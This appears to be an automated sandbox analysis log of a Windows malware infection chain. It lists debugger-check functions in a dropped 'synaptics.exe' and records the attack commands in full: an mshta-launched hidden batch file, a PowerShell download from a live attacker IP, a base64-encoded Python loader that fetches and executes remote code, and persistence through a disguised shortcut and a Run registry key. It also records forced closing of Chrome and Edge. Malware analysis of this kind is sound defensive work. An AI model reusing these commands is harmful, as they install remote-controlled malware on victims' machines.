                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BF11947 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,24_2_6BF11947
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BF1100E SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,24_2_6BF1100E
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BF31371 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,24_2_6BF31371
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BF3186C IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,24_2_6BF3186C
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BF4BFA8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,24_2_6BF4BFA8
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BF4CE7C IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,24_2_6BF4CE7C
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BF4D013 SetUnhandledExceptionFilter,24_2_6BF4D013
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BF6DAFD SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,24_2_6BF6DAFD
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BF6E603 SetUnhandledExceptionFilter,24_2_6BF6E603
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BF6E46C IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,24_2_6BF6E46C
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BF81377 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,24_2_6BF81377
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BF8186C IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,24_2_6BF8186C
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BF91371 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,24_2_6BF91371
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BF9186C IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,24_2_6BF9186C
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BFA1947 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,24_2_6BFA1947
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BFA100E SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,24_2_6BFA100E
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BFC1371 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,24_2_6BFC1371
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BFC186C IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,24_2_6BFC186C
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BFD1371 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,24_2_6BFD1371
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BFD186C IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,24_2_6BFD186C
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BFE1371 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,24_2_6BFE1371
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BFE186C IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,24_2_6BFE186C
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BFF1371 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,24_2_6BFF1371
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BFF186C IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,24_2_6BFF186C
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C00186C IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,24_2_6C00186C
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C001371 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,24_2_6C001371
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C01186C IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,24_2_6C01186C
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C011371 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,24_2_6C011371
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C03186C IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,24_2_6C03186C
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C031371 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,24_2_6C031371
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C05186C IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,24_2_6C05186C
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C051371 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,24_2_6C051371
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C06186C IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,24_2_6C06186C
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C061371 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,24_2_6C061371
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C07186C IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,24_2_6C07186C
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C071371 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,24_2_6C071371
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C08186C IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,24_2_6C08186C
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C081371 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,24_2_6C081371
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C0AEE1E SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,24_2_6C0AEE1E
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C0AF2F1 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,24_2_6C0AF2F1
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C1BFF5B IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,24_2_6C1BFF5B
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C1BF622 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,24_2_6C1BF622
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6C67A5A4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,27_2_6C67A5A4
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6E161371 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,27_2_6E161371
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6E16186C IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,27_2_6E16186C
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6E381371 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,27_2_6E381371
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6E38186C IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,27_2_6E38186C
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6EEC4A74 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,27_2_6EEC4A74
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6EEC452F SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,27_2_6EEC452F
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F561B59 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,27_2_6F561B59
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F561663 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,27_2_6F561663
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F5713F2 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,27_2_6F5713F2
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F5718EE IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,27_2_6F5718EE
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F58429B IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,27_2_6F58429B
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F583DA6 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,27_2_6F583DA6
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F6F1BE6 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,27_2_6F6F1BE6
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F6F20E1 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,27_2_6F6F20E1
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F708522 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,27_2_6F708522
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F708A1D IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,27_2_6F708A1D
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F806B5F SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,27_2_6F806B5F
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F80705A IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,27_2_6F80705A
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F82A994 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,27_2_6F82A994
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F82B2C7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,27_2_6F82B2C7
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F84223E SetUnhandledExceptionFilter,27_2_6F84223E
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F89E5ED IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,27_2_6F89E5ED
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F89D5F6 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,27_2_6F89D5F6
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F8DB56A IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,27_2_6F8DB56A
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F8DAC37 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,27_2_6F8DAC37
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F901C30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,27_2_6F901C30
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F90212C IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,27_2_6F90212C
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F916B97 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,27_2_6F916B97
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F917086 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,27_2_6F917086
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_73ACEB8F SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,27_2_73ACEB8F
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_73AF48CB IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,27_2_73AF48CB
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_73AF43D0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,27_2_73AF43D0

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: Yara matchFile source: amsi64_7780.amsi.csv, type: OTHER
                Source: Yara matchFile source: dropped/ConDrv, type: DROPPED
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta vbscript:createobject("wscript.shell").run("""C:\Users\user\Desktop\x.bat"" ::",0)(window.close)Jump to behavior
                Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\x.bat" ::"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('http://42.96.10.8/envxfix.zip', [System.IO.Path]::GetTempPath() + 'xFSOj9El1Q.zip') "Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $dst = [System.IO.Path]::Combine([System.Environment]::GetFolderPath('LocalApplicationData'), 'xFSOj9El1Q'); Add-Type -AssemblyName System.IO.Compression.FileSystem; if (Test-Path $dst) { Remove-Item -Recurse -Force "$dst\*" } else { New-Item -ItemType Directory -Force $dst } ; [System.IO.Compression.ZipFile]::ExtractToDirectory([System.IO.Path]::Combine([System.IO.Path]::GetTempPath(), 'xFSOj9El1Q.zip'), $dst) "Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $s = $payload = "import base64;exec(base64.b64decode('aW1wb3J0IHVybGxpYi5yZXF1ZXN0O2ltcG9ydCBiYXNlNjQ7ZXhlYyhiYXNlNjQuYjY0ZGVjb2RlKHVybGxpYi5yZXF1ZXN0LnVybG9wZW4oJ2h0dHA6Ly80Mi45Ni4xMC44L1ZPSU5FX0JVJykucmVhZCgpLmRlY29kZSgndXRmLTgnKSkp'))";$obj = New-Object -ComObject WScript.Shell;$link = $obj.CreateShortcut("$env:LOCALAPPDATA\WindowsSecurity.lnk");$link.WindowStyle = 7;$link.TargetPath = "$env:LOCALAPPDATA\xFSOj9El1Q\synaptics.exe";$link.IconLocation = "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,13";$link.Arguments = "-c `"$payload`"";$link.Save() "Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Windows Security' -PropertyType String -Value 'C:\Windows\Explorer.EXE C:\Users\user\AppData\Local\WindowsSecurity.lnk' -Force "Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe" -c "import base64;exec(base64.b64decode('aW1wb3J0IHVybGxpYi5yZXF1ZXN0O2ltcG9ydCBiYXNlNjQ7ZXhlYyhiYXNlNjQuYjY0ZGVjb2RlKHVybGxpYi5yZXF1ZXN0LnVybG9wZW4oJ2h0dHA6Ly80Mi45Ni4xMC44L1ZPSU5FX0JVJykucmVhZCgpLmRlY29kZSgndXRmLTgnKSkp'))" Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe "C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe" -c "import base64;exec(base64.b64decode('aW1wb3J0IHVybGxpYi5yZXF1ZXN0O2ltcG9ydCBiYXNlNjQ7ZXhlYyhiYXNlNjQuYjY0ZGVjb2RlKHVybGxpYi5yZXF1ZXN0LnVybG9wZW4oJ2h0dHA6Ly80Mi45Ni4xMC44L1ZPSU5FX0JVJykucmVhZCgpLmRlY29kZSgndXRmLTgnKSkp'))" Jump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exeJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; (new-object -typename system.net.webclient).downloadfile('http://42.96.10.8/envxfix.zip', [system.io.path]::gettemppath() + 'xfsoj9el1q.zip') "
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo $dst = [system.io.path]::combine([system.environment]::getfolderpath('localapplicationdata'), 'xfsoj9el1q'); add-type -assemblyname system.io.compression.filesystem; if (test-path $dst) { remove-item -recurse -force "$dst\*" } else { new-item -itemtype directory -force $dst } ; [system.io.compression.zipfile]::extracttodirectory([system.io.path]::combine([system.io.path]::gettemppath(), 'xfsoj9el1q.zip'), $dst) "
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo new-itemproperty -path 'hkcu:\software\microsoft\windows\currentversion\run' -name 'windows security' -propertytype string -value 'c:\windows\explorer.exe c:\users\user\appdata\local\windowssecurity.lnk' -force "
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "c:\users\user\appdata\local\xfsoj9el1q\synaptics.exe" -c "import base64;exec(base64.b64decode('aw1wb3j0ihvybgxpyi5yzxf1zxn0o2ltcg9ydcbiyxnlnjq7zxhlyyhiyxnlnjquyjy0zgvjb2rlkhvybgxpyi5yzxf1zxn0lnvybg9wzw4oj2h0dha6ly80mi45ni4xmc44l1zpsu5fx0jvjykucmvhzcgplmrly29kzsgndxrmltgnkskp'))"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe "c:\users\user\appdata\local\xfsoj9el1q\synaptics.exe" -c "import base64;exec(base64.b64decode('aw1wb3j0ihvybgxpyi5yzxf1zxn0o2ltcg9ydcbiyxnlnjq7zxhlyyhiyxnlnjquyjy0zgvjb2rlkhvybgxpyi5yzxf1zxn0lnvybg9wzw4oj2h0dha6ly80mi45ni4xmc44l1zpsu5fx0jvjykucmvhzcgplmrly29kzsgndxrmltgnkskp'))"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; (new-object -typename system.net.webclient).downloadfile('http://42.96.10.8/envxfix.zip', [system.io.path]::gettemppath() + 'xfsoj9el1q.zip') "Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo $dst = [system.io.path]::combine([system.environment]::getfolderpath('localapplicationdata'), 'xfsoj9el1q'); add-type -assemblyname system.io.compression.filesystem; if (test-path $dst) { remove-item -recurse -force "$dst\*" } else { new-item -itemtype directory -force $dst } ; [system.io.compression.zipfile]::extracttodirectory([system.io.path]::combine([system.io.path]::gettemppath(), 'xfsoj9el1q.zip'), $dst) "Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo new-itemproperty -path 'hkcu:\software\microsoft\windows\currentversion\run' -name 'windows security' -propertytype string -value 'c:\windows\explorer.exe c:\users\user\appdata\local\windowssecurity.lnk' -force "Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "c:\users\user\appdata\local\xfsoj9el1q\synaptics.exe" -c "import base64;exec(base64.b64decode('aw1wb3j0ihvybgxpyi5yzxf1zxn0o2ltcg9ydcbiyxnlnjq7zxhlyyhiyxnlnjquyjy0zgvjb2rlkhvybgxpyi5yzxf1zxn0lnvybg9wzw4oj2h0dha6ly80mi45ni4xmc44l1zpsu5fx0jvjykucmvhzcgplmrly29kzsgndxrmltgnkskp'))" Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe "c:\users\user\appdata\local\xfsoj9el1q\synaptics.exe" -c "import base64;exec(base64.b64decode('aw1wb3j0ihvybgxpyi5yzxf1zxn0o2ltcg9ydcbiyxnlnjq7zxhlyyhiyxnlnjquyjy0zgvjb2rlkhvybgxpyi5yzxf1zxn0lnvybg9wzw4oj2h0dha6ly80mi45ni4xmc44l1zpsu5fx0jvjykucmvhzcgplmrly29kzsgndxrmltgnkskp'))" Jump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BF46A00 ?SetSecurityDescriptorDacl@PySECURITY_DESCRIPTOR@@SAPAU_object@@PAU2@0@Z,PyArg_ParseTuple,PyExc_TypeError,PyExc_TypeError,PyErr_SetString,?_MakeAbsoluteSD@@YAHPAXPAPAX@Z,SetSecurityDescriptorDacl,?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z,?SetSD@PySECURITY_DESCRIPTOR@@QAEHPAX@Z,free,free,free,24_2_6BF46A00
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BF475E0 ?PyWinMethod_NewSID@@YAPAU_object@@PAU1@0@Z,_PyArg_ParseTuple_SizeT,_PyArg_ParseTuple_SizeT,PyErr_Clear,PyErr_Clear,_PyArg_ParseTuple_SizeT,PyErr_Clear,_PyArg_ParseTuple_SizeT,PySequence_Check,PyExc_TypeError,PyExc_TypeError,PyErr_SetString,PySequence_Size,PySequence_Tuple,_PyArg_ParseTuple_SizeT,_Py_Dealloc,AllocateAndInitializeSid,?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z,??0PySID@@QAE@PAX@Z,_Py_NewReference,malloc,memset,memcpy,24_2_6BF475E0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_00CA19E7 cpuid 24_2_00CA19E7
                Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
